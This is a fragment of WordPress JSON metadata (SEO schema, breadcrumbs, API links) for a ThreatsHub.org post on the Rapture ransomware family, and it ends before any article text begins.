Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/","og_locale":"en_US","og_type":"article","og_title":"Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-04-28T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/rapture-641.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Rapture, a Ransomware Family With Similarities to Paradise","datePublished":"2023-04-28T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/"},"wordCount":1579,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/04\/rapture-a-ransomware-family-with-similarities-to-paradise.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Ransomware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/","url":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/","name":"Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/04\/rapture-a-ransomware-family-with-similarities-to-paradise.png","datePublished":"2023-04-28T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/04\/rapture-a-ransomware-family-with-similarities-to-paradise.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/04\/rapture-a-ransomware-family-with-similarities-to-paradise.png","width":974,"height":510},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Rapture, a Ransomware Family With Similarities to Paradise"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/51671","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=51671"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/51671\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/51672"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=51671"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=51671"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=51671"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":51671,"date":"2023-04-28T00:00:00","date_gmt":"2023-04-28T00:00:00","guid":{"rendered":"urn:uuid:dbde8a7e-2662-52bf-1e3a-6c3e7a19e90d"},"modified":"2023-04-28T00:00:00","modified_gmt":"2023-04-28T00:00:00","slug":"rapture-a-ransomware-family-with-similarities-to-paradise","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/","title":{"rendered":"Rapture, a Ransomware Family With Similarities to Paradise"},"content":{"rendered":"